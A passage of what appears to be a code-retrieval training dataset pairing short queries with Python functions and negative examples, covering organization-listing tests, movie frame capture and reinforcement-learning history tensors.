"def test_get_orgs(self):\n # Fetch just one org by name\n parameters = {\n 'Name': \"'%s'\" % TEST_MS_MEMBER_ORG_NAME,\n }\n org_list = self.service.get_orgs(parameters=parameters)\n self.assertEqual(len(org_list), 1)\n self.assertEqual(type(org_list[0]), Organization)\n\n # @todo - test since_when parameter\n\n # Fetch all orgs using get_all=True\n # But limit to 1 result per iteration, 2 iterations\n org_list = self.service.get_orgs(limit_to=1, max_calls=2)\n self.assertEqual(len(org_list), 2)\n self.assertEqual(type(org_list[0]), Organization)\n\n # How does recursion handle the end?\n # 8055 records at the time of this test\n org_list = self.service.get_orgs(\n start_record=8000, limit_to=10)\n self.assertGreater(len(org_list), 1)\n self.assertEqual(type(org_list[0]), Organization)",
"def test_all_organizations(self):\n i = self.instance.all_organizations()\n self.get_next(i)\n\n self.session.get.assert_called_once_with(\n url_for(\"organizations\"), params={\"per_page\": 100}, headers={}\n )",
"def test_view_can_get_all_organizations(self):\n another_org = {\n \"name\": \"Andela\",\n \"description\": \"Train the next gen of tech leaders\"\n }\n self.client().post('/api/organizations/', data=self.org_data)\n self.client().post('/api/organizations/', data=another_org)\n\n # now get all the created orgs\n response = self.client().get('/api/organizations/')\n self.assertEqual(response.status_code, 200)\n self.assertIn(\"Andela\", str(response.data))",
"def sample_orgs():\n org1 = Organization(_id=1000,\n url='org1.au',\n external_id='1000-org',\n name='Good Organization',\n domain_names=['org1.au'],\n created_at='2017-06-23T10:31:39 -10:00',\n details='LedaCorp',\n shared_tickets=True,\n tags=['tag100', 'tag200'])\n\n org2 = Organization(_id=2000,\n url='org2.au',\n external_id='2000-org',\n name='Bad Organization',\n domain_names=['org2.au'],\n created_at='2020-06-23T10:31:39 -10:00',\n details='PidaCorp',\n shared_tickets=False,\n tags=['tag200', 'tag400'])\n\n orgs_list = [org1, org2]\n return orgs_list",
"def test_all_organizations_per_page(self):\n i = self.instance.all_organizations(per_page=25)\n self.get_next(i)\n\n self.session.get.assert_called_once_with(\n url_for(\"organizations\"), params={\"per_page\": 25}, headers={}\n )",
"def organizations():",
"def gov_orgs():\n us_gov_github_orgs = set()\n\n gov_orgs_json = requests.get(\n \"https://government.github.com/organizations.json\",\n timeout=DEFAULT_REQUESTS_TIMEOUTS,\n ).json()\n\n us_gov_github_orgs.update(gov_orgs_json[\"governments\"][\"U.S. Federal\"])\n us_gov_github_orgs.update(\n gov_orgs_json[\"governments\"][\"U.S. Military and Intelligence\"]\n )\n us_gov_github_orgs.update(gov_orgs_json[\"research\"][\"U.S. Research Labs\"])\n\n return list(us_gov_github_orgs)",
"def get_github_orgs():\n gqlapi = gql.get_api()\n return gqlapi.query(GITHUB_ORGS_QUERY)[\"orgs\"]",
"def search_orgs(**kwargs):\n orgs = {'orgs': []}\n if kwargs.get('business_identifier', None):\n affiliation: AffiliationModel = AffiliationModel. \\\n find_affiliations_by_business_identifier(kwargs.get('business_identifier'))\n if affiliation:\n orgs['orgs'].append(Org(OrgModel.find_by_org_id(affiliation.org_id)).as_dict())\n elif kwargs.get('org_type', None):\n org_models = OrgModel.find_by_org_access_type(kwargs.get('org_type'))\n for org in org_models:\n orgs['orgs'].append(Org(org).as_dict())\n return orgs",
"def get_organizations(self):\n url = \"{}/organizations\".format(self.API_URL)\n if self.debug:\n self.print(\"Sending GET request to URL {}\".format(url))\n r = self.session.get(url)\n r.raise_for_status()\n return r.json()",
"def get_managed_requester_orgs(cache=True):\n\n db = current.db\n\n auth = current.auth\n s3db = current.s3db\n\n organisation_ids = None\n\n user = auth.user\n ORG_ADMIN = auth.get_system_roles().ORG_ADMIN\n if user and ORG_ADMIN in user.realms:\n realms = user.realms.get(ORG_ADMIN)\n if realms:\n from .config import TESTSTATIONS\n otable = s3db.org_organisation\n mtable = s3db.org_group_membership\n gtable = s3db.org_group\n ltable = s3db.org_organisation_organisation_type\n rtable = s3db.req_requester_category\n\n join = [mtable.on((mtable.organisation_id == otable.id) & \\\n (mtable.deleted == False) & \\\n (gtable.id == mtable.group_id) & \\\n (gtable.name == TESTSTATIONS)),\n rtable.on((ltable.organisation_id == otable.id) & \\\n (ltable.deleted == False) & \\\n (rtable.organisation_type_id == ltable.organisation_type_id) & \\\n (rtable.item_category_id != None) & \\\n (rtable.deleted == False)),\n ]\n\n query = otable.pe_id.belongs(realms)\n rows = db(query).select(otable.id,\n cache = s3db.cache if cache else None,\n groupby = otable.id,\n join = join,\n )\n if rows:\n organisation_ids = list(set(row.id for row in rows))\n\n return organisation_ids",
"def test_organization_resources_get(self):\n pass",
"def test_all_repositories(self):\n i = self.instance.all_repositories()\n self.get_next(i)\n\n self.session.get.assert_called_once_with(\n url_for(\"repositories\"), params={\"per_page\": 100}, headers={}\n )",
"def list(self):\n url = urljoin(self.client.base_url, 'organizations')\n url = furl(url).add({'apikey': self.client.api_key}).url\n resp = requests.get(url)\n return resp.json()",
"def test_organizations(self):\n self.assert_requires_auth(self.instance.organizations)",
"def testOrgAdminsForOrg(self):\n org_admin_properties = {'org_admin_for': [self.foo_org.key()],\n 'is_org_admin': True}\n\n foo_org_admin1 = seeder_logic.seed(GCIProfile, org_admin_properties)\n foo_org_admin2 = seeder_logic.seed(GCIProfile, org_admin_properties)\n\n org_admin_properties['org_admin_for'] = [self.bar_org.key()]\n bar_org_admin = seeder_logic.seed(GCIProfile, org_admin_properties)\n\n # Check for self.foo_org (two admins)\n expected = [foo_org_admin1.key(), foo_org_admin2.key()]\n actual = [profiles.key()\n for profiles in profile_logic.orgAdminsForOrg(self.foo_org)]\n self.assertEqual(expected, actual)\n\n # Check for self.bar_org (just one admin)\n expected = [bar_org_admin.key()]\n actual = [profiles.key()\n for profiles in profile_logic.orgAdminsForOrg(self.bar_org)]\n self.assertEqual(expected, actual)",
"def test_get_organization_memberships(self):\n pass",
"def get_quay_orgs():\n gqlapi = gql.get_api()\n return gqlapi.query(QUAY_ORGS_QUERY)[\"quay_orgs\"]"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test that get_all_orgs returns only those orgs whose configurations are enabled.
|
def test_get_all_orgs_returns_only_enabled(self):
expected_orgs = [self.test_config2['course_org_filter']]
# add SiteConfiguration to database
SiteConfigurationFactory.create(
site=self.site,
site_values=self.test_config1,
enabled=False,
)
SiteConfigurationFactory.create(
site=self.site2,
site_values=self.test_config2
)
# Test that the default value is returned if the value for the given key is not found in the configuration
self.assertCountEqual(SiteConfiguration.get_all_orgs(), expected_orgs)
|
[
"def test_get_all_orgs(self):\n expected_orgs = [self.test_config1['course_org_filter'], self.test_config2['course_org_filter']]\n # add SiteConfiguration to database\n SiteConfigurationFactory.create(\n site=self.site,\n site_values=self.test_config1\n )\n SiteConfigurationFactory.create(\n site=self.site2,\n site_values=self.test_config2\n )\n\n # Test that the default value is returned if the value for the given key is not found in the configuration\n self.assertCountEqual(SiteConfiguration.get_all_orgs(), expected_orgs)",
"def test_get_orgs(self):\n # Fetch just one org by name\n parameters = {\n 'Name': \"'%s'\" % TEST_MS_MEMBER_ORG_NAME,\n }\n org_list = self.service.get_orgs(parameters=parameters)\n self.assertEqual(len(org_list), 1)\n self.assertEqual(type(org_list[0]), Organization)\n\n # @todo - test since_when parameter\n\n # Fetch all orgs using get_all=True\n # But limit to 1 result per iteration, 2 iterations\n org_list = self.service.get_orgs(limit_to=1, max_calls=2)\n self.assertEqual(len(org_list), 2)\n self.assertEqual(type(org_list[0]), Organization)\n\n # How does recursion handle the end?\n # 8055 records at the time of this test\n org_list = self.service.get_orgs(\n start_record=8000, limit_to=10)\n self.assertGreater(len(org_list), 1)\n self.assertEqual(type(org_list[0]), Organization)",
"def test_all_organizations(self):\n i = self.instance.all_organizations()\n self.get_next(i)\n\n self.session.get.assert_called_once_with(\n url_for(\"organizations\"), params={\"per_page\": 100}, headers={}\n )",
"def sample_orgs():\n org1 = Organization(_id=1000,\n url='org1.au',\n external_id='1000-org',\n name='Good Organization',\n domain_names=['org1.au'],\n created_at='2017-06-23T10:31:39 -10:00',\n details='LedaCorp',\n shared_tickets=True,\n tags=['tag100', 'tag200'])\n\n org2 = Organization(_id=2000,\n url='org2.au',\n external_id='2000-org',\n name='Bad Organization',\n domain_names=['org2.au'],\n created_at='2020-06-23T10:31:39 -10:00',\n details='PidaCorp',\n shared_tickets=False,\n tags=['tag200', 'tag400'])\n\n orgs_list = [org1, org2]\n return orgs_list",
"def test_view_can_get_all_organizations(self):\n another_org = {\n \"name\": \"Andela\",\n \"description\": \"Train the next gen of tech leaders\"\n }\n self.client().post('/api/organizations/', data=self.org_data)\n self.client().post('/api/organizations/', data=another_org)\n\n # now get all the created orgs\n response = self.client().get('/api/organizations/')\n self.assertEqual(response.status_code, 200)\n self.assertIn(\"Andela\", str(response.data))",
"def get_managed_requester_orgs(cache=True):\n\n db = current.db\n\n auth = current.auth\n s3db = current.s3db\n\n organisation_ids = None\n\n user = auth.user\n ORG_ADMIN = auth.get_system_roles().ORG_ADMIN\n if user and ORG_ADMIN in user.realms:\n realms = user.realms.get(ORG_ADMIN)\n if realms:\n from .config import TESTSTATIONS\n otable = s3db.org_organisation\n mtable = s3db.org_group_membership\n gtable = s3db.org_group\n ltable = s3db.org_organisation_organisation_type\n rtable = s3db.req_requester_category\n\n join = [mtable.on((mtable.organisation_id == otable.id) & \\\n (mtable.deleted == False) & \\\n (gtable.id == mtable.group_id) & \\\n (gtable.name == TESTSTATIONS)),\n rtable.on((ltable.organisation_id == otable.id) & \\\n (ltable.deleted == False) & \\\n (rtable.organisation_type_id == ltable.organisation_type_id) & \\\n (rtable.item_category_id != None) & \\\n (rtable.deleted == False)),\n ]\n\n query = otable.pe_id.belongs(realms)\n rows = db(query).select(otable.id,\n cache = s3db.cache if cache else None,\n groupby = otable.id,\n join = join,\n )\n if rows:\n organisation_ids = list(set(row.id for row in rows))\n\n return organisation_ids",
"def test_all_organizations_per_page(self):\n i = self.instance.all_organizations(per_page=25)\n self.get_next(i)\n\n self.session.get.assert_called_once_with(\n url_for(\"organizations\"), params={\"per_page\": 25}, headers={}\n )",
"def organizations():",
"def testOrgAdminsForOrg(self):\n org_admin_properties = {'org_admin_for': [self.foo_org.key()],\n 'is_org_admin': True}\n\n foo_org_admin1 = seeder_logic.seed(GCIProfile, org_admin_properties)\n foo_org_admin2 = seeder_logic.seed(GCIProfile, org_admin_properties)\n\n org_admin_properties['org_admin_for'] = [self.bar_org.key()]\n bar_org_admin = seeder_logic.seed(GCIProfile, org_admin_properties)\n\n # Check for self.foo_org (two admins)\n expected = [foo_org_admin1.key(), foo_org_admin2.key()]\n actual = [profiles.key()\n for profiles in profile_logic.orgAdminsForOrg(self.foo_org)]\n self.assertEqual(expected, actual)\n\n # Check for self.bar_org (just one admin)\n expected = [bar_org_admin.key()]\n actual = [profiles.key()\n for profiles in profile_logic.orgAdminsForOrg(self.bar_org)]\n self.assertEqual(expected, actual)",
"def test_organizations(self):\n self.assert_requires_auth(self.instance.organizations)",
"def search_orgs(**kwargs):\n orgs = {'orgs': []}\n if kwargs.get('business_identifier', None):\n affiliation: AffiliationModel = AffiliationModel. \\\n find_affiliations_by_business_identifier(kwargs.get('business_identifier'))\n if affiliation:\n orgs['orgs'].append(Org(OrgModel.find_by_org_id(affiliation.org_id)).as_dict())\n elif kwargs.get('org_type', None):\n org_models = OrgModel.find_by_org_access_type(kwargs.get('org_type'))\n for org in org_models:\n orgs['orgs'].append(Org(org).as_dict())\n return orgs",
"def get_github_orgs():\n gqlapi = gql.get_api()\n return gqlapi.query(GITHUB_ORGS_QUERY)[\"orgs\"]",
"def gov_orgs():\n us_gov_github_orgs = set()\n\n gov_orgs_json = requests.get(\n \"https://government.github.com/organizations.json\",\n timeout=DEFAULT_REQUESTS_TIMEOUTS,\n ).json()\n\n us_gov_github_orgs.update(gov_orgs_json[\"governments\"][\"U.S. Federal\"])\n us_gov_github_orgs.update(\n gov_orgs_json[\"governments\"][\"U.S. Military and Intelligence\"]\n )\n us_gov_github_orgs.update(gov_orgs_json[\"research\"][\"U.S. Research Labs\"])\n\n return list(us_gov_github_orgs)",
"def organizations(self):\n from organization import Organization # avoid circular import\n\n # lookup using new incidents field\n orgs = list(\n Organization.all().filter('incidents', self.key())\n .filter('org_verified', True)\n .filter('is_active', True)\n )\n\n # build list of id and look for global admin\n org_ids = set()\n seen_global_admin = False\n for org in orgs:\n if org.is_global_admin:\n seen_global_admin = True\n org_id = org.key().id()\n if org_id not in org_ids:\n org_ids.add(org_id)\n\n # check legacy incident field\n legacy_field_orgs = Organization.all().filter('incident', self.key()) \\\n .filter('org_verified', True) \\\n .filter('is_active', True)\n for org in legacy_field_orgs:\n if org.key().id() not in org_ids:\n orgs.append(org)\n\n # prepend global admin if not encountered\n if not seen_global_admin:\n orgs = (\n list(Organization.all().filter('name', 'Admin')) +\n orgs\n )\n return orgs",
"def is_all_org_admin(self, u):\n return not self.user_organizations(u).exclude(pk__in=Organization.accessible_pk_qs(self.user, 'admin_role')).exists()",
"def test_get_organization_memberships(self):\n pass",
"def test_organization_resources_get(self):\n pass",
"def test_filter_non_exist_registry(self):\n\n org1 = Organization.objects.create(name='Example')\n org2 = Organization.objects.create(name='Bitergia')\n org3 = Organization.objects.create(name='LibreSoft')\n\n client = graphene.test.Client(schema)\n test_query = SH_ORGS_QUERY_FILTER % 'Test'\n executed = client.execute(test_query,\n context_value=self.context_value)\n\n orgs = executed['data']['organizations']['entities']\n self.assertListEqual(orgs, [])",
"def get_organizations(self):\n url = \"{}/organizations\".format(self.API_URL)\n if self.debug:\n self.print(\"Sending GET request to URL {}\".format(url))\n r = self.session.get(url)\n r.raise_for_status()\n return r.json()"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
A tuple (width,height) in pixels of a movie frame.
|
def frame_size(self):
return self.display.width, self.display.height
|
[
"def frameSize(self):\n size = None\n if self.isVideo():\n if 'width' in self.__dict__ and 'height' in self.__dict__:\n try:\n size = (int(self.__dict__['width']),int(self.__dict__['height']))\n except Exception as e:\n pass\n size = (0,0)\n return size",
"def get_image_size(frame: np.array) -> Tuple[int, int]:\n image_size = (frame.shape[1], frame.shape[0]) # width, height\n return image_size",
"def get_frame_size(self):\n return (self.frame.shape[1], self.frame.shape[0])",
"def _size(self):\n xpixels = ctypes.c_int32()\n ypixels = ctypes.c_int32()\n sdk.GetDetector(ctypes.byref(xpixels), ctypes.byref(ypixels))\n self.width = xpixels.value\n self.height = ypixels.value\n self.pixels = xpixels.value * ypixels.value\n return (xpixels.value, ypixels.value)",
"def size(self) -> tuple:\n return self.width, self.height",
"def GetFrameSize(self):\n ...",
"def _get_size(self):\n if 'height' not in self or 'width' not in self:\n return None\n width = int(float(self.params['width'])) # allow float sizes (100.0), but truncate decimals\n height = int(float(self.params['height']))\n return (width, height)",
"def frame_width(self):\n # type: () -> int\n return self._frame_width",
"def get_dimensions(self):\t\t\n\t\t\n\t\treturn (self.x, self.y, self.w, self.h)",
"def get_size(self):\n assert self.__texture is not None\n return (self.__width, self.__height)",
"def size(self):\n return (len(self.pixels[0]), len(self.pixels[0][0]))",
"def get_dimensions(input_file):\n deets = get_video_details(input_file)\n dimensions = deets['width'],deets['height']\n width = int(dimensions[0])\n height = int(dimensions[1])\n return width, height",
"def frame_height(self):\n # type: () -> int\n return self._frame_height",
"def get_image_size_and_frames_count(path: str) -> Tuple[Tuple[int, int], int]:\n import skvideo.io\n\n vreader = skvideo.io.FFmpegReader(path)\n vlength = vreader.getShape()[0]\n img_height = vreader.getShape()[1]\n img_width = vreader.getShape()[2]\n\n img_size = (img_height, img_width)\n\n return img_size, vlength",
"def resolution_of_videofile(self):\n p = self.probe()\n assert 'streams' in p and len(['streams']) > 0\n (H,W) = (p['streams'][0]['height'], p['streams'][0]['width']) # (height, width) in pixels\n return (W,H) if ('tags' in p['streams'][0] and 'rotate' in p['streams'][0]['tags'] and p['streams'][0]['tags']['rotate'] in ['90','270']) else (H,W)",
"def _get_wh(self):\n return self._source.width, self._source.height",
"def get_dimensions(self):\n\n\t\treturn (self._x, self._y, self._w, self._h)",
"def FrameSize(self):\n return self._FrameSize",
"def get_frame_shape(movie_file: PathType):\n cap = cv2.VideoCapture(str(movie_file))\n success, frame = cap.read()\n cap.release()\n return frame.shape"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Grab the image information from the display and save as a movie frame. The keyword arguments are not being used in the subclass.
|
def grab_frame(self, **savefig_kwargs):
try:
image = pyglet.image.get_buffer_manager().get_color_buffer().get_image_data()
self._proc.stdin.write(image.get_data('RGBA',
-4 * self.display.width))
except RuntimeError:
out, err = self._proc.communicate()
print('MovieWriter -- Error ')
print('running proc:\n%s\n%s' % (out, err))
raise
|
[
"def saveFrame(self, filename):\n\t\tself.frameList.append(filename)\n\t\tvisualizer = self.visualizer\n\t\timageType = self.imageType\n\t\tLogging.info(\"Saving screenshot to \", filename, kw = \"visualizer\")\n\t\tcomm = \"visualizer.getCurrentMode().saveSnapshot(filename)\"\n\t\teval(comm)",
"def saveFrame(self):\n # Needs to be completed\n \n # Ask the user for the destination file\n dest = QtGui.QFileDialog.getSaveFileName(self, \"Save frame as...\", '', 'Images (*.png *.gif *.jpg *.jpeg)')\n # Grab and save a frame in the given file\n self.gui.video.device.save(str(dest))",
"def show(self, name: str, frame):\n self.putImage(name, frame)",
"def capture(self):\n self.camera = self.ids['camera']\n timestr = time.strftime(\"%Y%m%d_%H%M%S\")\n self.camera.export_to_png(\"IMG_{}.png\".format(timestr))\n print(\"Captured\")",
"def display(self):\n self.o.display_image(self.image)",
"def save_movie( gsd_file,output_file,resolution,file_save=False,down_sample=1):\n path_tracer = fresnel.tracer.Path(device,resolution[0],resolution[1])\n\n f = gsd.fl.GSDFile(gsd_file, 'rb')\n t = gsd.hoomd.HOOMDTrajectory(f)\n\n a = render_sphere_frame(frame=t[0],path_tracer=path_tracer);\n\n if tuple(map(int, (PIL.__version__.split(\".\")))) < (3,4,0):\n print(\"Warning! Movie display output requires pillow 3.4.0 or newer.\")\n print(\"Older versions of pillow may only display the first frame.\")\n\n im0 = PIL.Image.fromarray(a[:,:, 0:3], mode='RGB').convert(\"P\", palette=PIL.Image.ADAPTIVE);\n ims = [];\n points = numpy.linspace(1,len(t)-1,(len(t)-1)/down_sample);\n print(points)\n for point in points:\n f = t[int(numpy.floor(point))];\n a = render_sphere_frame(frame=f,path_tracer=path_tracer);\n im = PIL.Image.fromarray(a[:,:, 0:3], mode='RGB')\n im_p = im.quantize(palette=im0);\n ims.append(im_p)\n if file_save:\n if not os.path.exists(os.path.dirname(output_file)):\n os.makedirs(os.path.dirname(output_file),exist_ok=True);\n\n im0.save(output_file, 'gif', save_all=True, append_images=ims, duration=1500, loop=0)\n\n return (f)",
"def __init__(self, master, movie_data):\n super().__init__(master)\n self.transient()\n self.focus_set()\n\n # Display Movie Poster\n try:\n if movie_data['Poster'] != 'N/A':\n urllib.request.urlretrieve(movie_data['Poster'], \"poster.jpg\")\n image = Image.open(\"poster.jpg\")\n image = image.resize((160,240))\n else:\n image = Image.open(\"default_poster.jpg\")\n except urllib.error.HTTPError: # windows error\n image = Image.open(\"default_poster.jpg\")\n except urllib.error.URLError: # mac error\n image = Image.open(\"default_poster.jpg\")\n photo = ImageTk.PhotoImage(image)\n label = tk.Label(self, image=photo)\n label.image = photo # keep a reference!\n label.grid(row=0, column=0)\n\n # display all data\n Movie_Data_Frame = tk.Frame(self)\n year = str(movie_data['Year'])[:4]\n rating = str(movie_data['imdbRating'])\n runtime = movie_data['Runtime'].replace(' min', '')\n tk.Label(Movie_Data_Frame, text=movie_data['Title'], wraplength=300, font=('Helvetica',20)).grid(sticky='w')\n tk.Label(Movie_Data_Frame, text='Year: ' + year).grid(sticky='w')\n tk.Label(Movie_Data_Frame, text='imdb Rating: ' + rating).grid(sticky='w')\n tk.Label(Movie_Data_Frame, text='Runtime: ' + str(runtime) + ' mins').grid(sticky='w')\n tk.Label(Movie_Data_Frame, text='Plot: ' + movie_data['Plot'], wraplength=300, justify=tk.LEFT).grid(sticky='w')\n tk.Label(Movie_Data_Frame, text='Genre: ' + movie_data['Genre'], wraplength=300, justify=tk.LEFT).grid(sticky='w')\n tk.Label(Movie_Data_Frame, text='Director: ' + movie_data['Director']).grid(sticky='w')\n tk.Label(Movie_Data_Frame, text='Actors: ' + movie_data['Actors'], wraplength=300, justify=tk.LEFT).grid(sticky='w')\n tk.Label(Movie_Data_Frame, text='Awards: ' + movie_data['Awards'], wraplength=300, justify=tk.LEFT).grid(sticky='w')\n Movie_Data_Frame.grid(row=0, column=1)\n tk.Button(self, text='Save Movie', command=lambda : self.writeToFile(movie_data)).grid(sticky=\"nsew\")",
"def showFrame(self):\r\n if self.frameArray is None:\r\n print(\"please get an image from Nao with the method updateFrame()\")\r\n else:\r\n cv2.imshow(\"current frame\", self.frameArray)",
"def save_image(*args, **kwargs): # real signature unknown; restored from __doc__\n pass",
"def movieInfo(numFrames=bool, frameCount=bool, negTimesOK=bool, quickTime=bool, width=bool, timeCode=bool, dropFrame=bool, timeScale=bool, movieTexture=bool, height=bool, timeCodeTrack=bool, twentyFourHourMax=bool, counter=bool, frameDuration=bool):\n pass",
"def image(self, obj):",
"def capture(self):\n # insert the canvas\n self.fitsimage.add(self.canvas, tag='mycanvas')",
"def snapshot(self):\n ts = datetime.datetime.now() # grab the current timestamp\n filename = \"{}.png\".format(ts.strftime(\n \"%Y-%m-%d_%H-%M-%S\")) # construct filename\n\n ok, frame = self.cap.read()\n image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n image = Image.fromarray(image)\n\n # save image as jpeg file\n image.save('exports/snapshots/' + filename, \"PNG\")\n print(\"[INFO] saved {}\".format(filename))",
"def displayImage(self, iFrame, img=None):\n if not img:\n imgPath = self.imgList[iFrame.currImg]\n #img = Image.open(imgPath);\n img = mpimg.imread(imgPath);\n # if img.mode == \"I;16\":\n # print \"16 bit image, converting to 8 bit\"\n # img.mode = 'I'\n # img = img.point(lambda i:i*(1./256.)).convert(\"RGB\");\n # img = img.resize((self.ni, self.nj))\n\n #iframe keeps track of its image\n iFrame.image = img\n\n #if point is generated, gotta draw squares first\n if self.point3d:\n point = self.allUVs[iFrame.currImg];\n self.drawBox(iFrame, point)\n\n # store photo image (probably not needed in iFrame)\n # iFrame.tkpi = ImageTk.PhotoImage(img)\n iFrame.tkpi = plt.imshow(img)\n\n #update frames' label\n # iFrame.labString.set(\"img {0}\".format(iFrame.currImg))\n\n # #create new label image\n # if iFrame.label_image :\n # iFrame.label_image.destroy()\n # iFrame.label_image = Label(iFrame.frame, image=iFrame.tkpi)\n # iFrame.label_image.image = iFrame.tkpi\n # iFrame.label_image.bind(\"<Button-1>\", lambda event, arg=iFrame: self.runprobe(event, iFrame))\n # iFrame.label_image.bind(\"<Button-3>\", lambda event, arg=iFrame: self.nextImage(event, iFrame))\n # iFrame.label_image.bind(\"<Button-2>\", lambda event, arg=iFrame: self.prevImage(event, iFrame))\n # iFrame.label_image.pack(side = LEFT);",
"def test_make_movie_callable(self):\n image_dir = os.path.join('..', 'figs')\n image_base = os.path.join(image_dir, 'bio')\n self.biosim._image_base = image_base\n self.biosim.simulate(num_years=3, vis_years=1)\n self.biosim.make_movie()",
"def writeFrame(self, frameNum, img):\n # use me pattern in for dest\n frameFilename = self.dest % frameNum\n print \"write \" + frameFilename\n # write file\n if not(img):\n img = Image.new(\"RGB\", self.size, \"White\")\n img.save(frameFilename, 'PNG')",
"def update_display(self):\n self.disp.image(self.image)\n self.disp.display()",
"def showVideo(self): \n try:\n cv2.namedWindow(self.parking_id,cv2.WINDOW_NORMAL)\n img = self.img\n cv2.imshow(self.parking_id,img)\n if cv2.waitKey(1) & 0xFF == 27:\n self.logger.warn('Show video stopped along with main execution, due to ESC key pressed')\n self.logger.warn('Stopping thread of frame obtention ...')\n cv2.destroyAllWindows()\n self.stream_thread.stop()\n sys.exit(1)\n except Exception as e:\n self.logger.error('Exception during show video: {}'.format(e))\n self.logger.error(\"Error during send Hist img process: {}\".format(e))\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n self.logger.error(exc_type, fname, exc_tb.tb_lineno)",
"def __writeFrame(self, saveDir=\"./ballData\"):\r\n if not os.path.exists(saveDir):\r\n os.makedirs(saveDir)\r\n saveName = str(int(time.time()))\r\n saveImgPath = os.path.join(saveDir, saveName + \".jpg\")\r\n try:\r\n cv2.imwrite(saveImgPath, self.frameArray)\r\n except:\r\n print(\"Error when saveing current frame!\")"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
calculates h_t = h_{t1} + d (w_t (af_t / r pi^2) h_{t1}) and appends it to head history
|
def _update_head(self):
wl = self.wl + self.seasonal_component()
prev_h = self.head_history[-1]
new_h = prev_h + self.d * (wl - self.flow_component() - prev_h)
self.head_history.append(new_h)
|
[
"def updateMotionHistory(silhouette, mhi, timestamp, duration):\n pass",
"def history_RewardTensor(env, h):\n StateHists = StateHistsIx(env, h)\n Zh = len(StateHists)\n dims = list(env.R.shape)\n dims[1] = Zh\n dims[-1] = Zh\n\n Rh = np.zeros(dims)\n for h, hist in enumerate(StateHists):\n for h_, hist_ in enumerate(StateHists):\n Rh[:, h, ..., h_] = env.R[:, hist[-1], ..., hist_[-1]]\n return Rh",
"def make_hist_lookuptable(eta_ls, pT_ls, sample=None, hist_type=None, bin_info_ls=None):#sample_ls, hist_type_ls, ):\n from ROOT import TH1F\n \n hist_dict = {}\n for k in range(len(eta_ls)-1):\n eta_min = eta_ls[k]\n eta_max = eta_ls[k+1]\n eta_key = \"{}eta{}\".format(eta_min, eta_max)\n\n for j in range(len(pT_ls)-1):\n pT_min = pT_ls[j]\n pT_max = pT_ls[j+1]\n pT_key = \"{}pT{}\".format(pT_min, pT_max)\n\n # for sample in sample_ls:\n # for h_type in hist_type_ls:\n if sample is None:\n h_name = \"h_{}_{}_{}\".format(eta_key, pT_key, hist_type)\n else:\n # Sample specific.\n h_name = \"h_{}_{}_{}_{}\".format(eta_key, pT_key, sample, hist_type)\n print(f\"Making h_name: {h_name}\")\n \n # x_min = bin_dict[sample][h_type][0]\n # x_max = bin_dict[sample][h_type][1]\n # bwidth = bin_dict[sample][h_type][2]\n\n x_min = bin_info_ls[0]\n x_max = bin_info_ls[1]\n bwidth = bin_info_ls[2]\n n_bins = calc_num_bins(*bin_info_ls)\n # n_bins = int(round( (x_max - x_min)/float(bwidth) ))\n \n hist_dict[h_name] = TH1F(h_name, h_name, n_bins, x_min, x_max)\n hist_dict[h_name].Sumw2()\n \n return hist_dict",
"def history_TransitionTensor(env, h):\n Hists = StateHistsIx(env, h)\n\n Zh = len(Hists)\n Th_dims = list(env.T.shape)\n Th_dims[0] = Zh\n Th_dims[-1] = Zh\n Th = np.ones(Th_dims)\n\n for i, hist in enumerate(Hists):\n for j, hist_ in enumerate(Hists):\n possible = hist[1:] == hist_[:-1] # Is the transition possible?\n Th[i, ..., j] = possible*env.T[hist[-1],...,hist_[-1]]\n\n return Th",
"def make_input_hist(self):\n ch_names = {\n self.ee_ch_name: 0,\n self.mm_ch_name: 1,\n }\n hist_temp = ROOT.TH1F(\"temp\", \"template\", 30, 0., 1500.)\n\n out_name = self.get_input_hist_name()\n fout = ROOT.TFile.Open(out_name, 'recreate')\n for chan, cut in ch_names.iteritems():\n # signal only shape\n sig_name = \"mT_\"+chan+\"_signal\"\n h_sig = hist_temp.Clone(sig_name)\n weight = \"w_H___\"+str(self.mass)+\"_\"+str(self.width)+\"*(pass_to_SR==1 && event_type==\"+str(cut)+\")\"\n self.tree.Draw(\"mT_ZZ>>\"+h_sig.GetName(), weight)\n h_sig.Scale(1000)\n h_sig.Write()\n h_sig_clone = h_sig.Clone(\"mT-Nominal-\"+chan)\n h_sig_clone.Write()\n\n # interference of higgs and Higgs\n int_hH_name = \"mT_\"+chan+\"_hH\"\n h_hH = hist_temp.Clone(int_hH_name)\n weight = \"w_h_H_\"+str(self.mass)+\"_\"+str(self.width)+\"*(pass_to_SR==1 && event_type==\"+str(cut)+\")\"\n self.tree.Draw(\"mT_ZZ>>\"+h_hH.GetName(), weight)\n h_hH.Scale(1000)\n h_hH.Write()\n\n # interference of Higgs and background\n int_HB_name = \"mT_\"+chan+\"_HB\"\n h_HB = hist_temp.Clone(int_HB_name)\n weight = \"w_H_B_\"+str(self.mass)+\"_\"+str(self.width)+\"*(pass_to_SR==1 && event_type==\"+str(cut)+\")\"\n self.tree.Draw(\"mT_ZZ>>\"+h_HB.GetName(), weight)\n h_HB.Scale(1000)\n h_HB.Write()\n fout.Close()",
"def update_history(history, index, mus):\n\n # pull arm i\n x_it = get_sample(mus[index])\n history[index][0] += x_it\n history[index][1] += 1.0\n return history",
"def history_ObservationTensor(env, h):\n StateHists = StateHistsIx(env, h)\n ObsHists = ObsHistsIx(env, h)\n\n Qh = len(ObsHists)\n Zh = len(StateHists)\n Oh = np.ones((env.N, Zh, Qh))\n\n for i, shist in enumerate(StateHists):\n for j, ohist in enumerate(ObsHists):\n Oh[:, i, j] = np.prod([env.O[:, shist[k], ohist[k]]\n for k in range(len(shist))], axis=0)\n \n return Oh",
"def saveHistory(self):\n self.time_his.append(self.curr_time)\n self.yaw_his.append(self.yaw)\n self.psiDot_his.append(self.psiDot)\n self.ax_his.append(self.ax)\n self.ay_his.append(self.ay)\n self.roll_his.append(self.roll)\n self.pitch_his.append(self.pitch)",
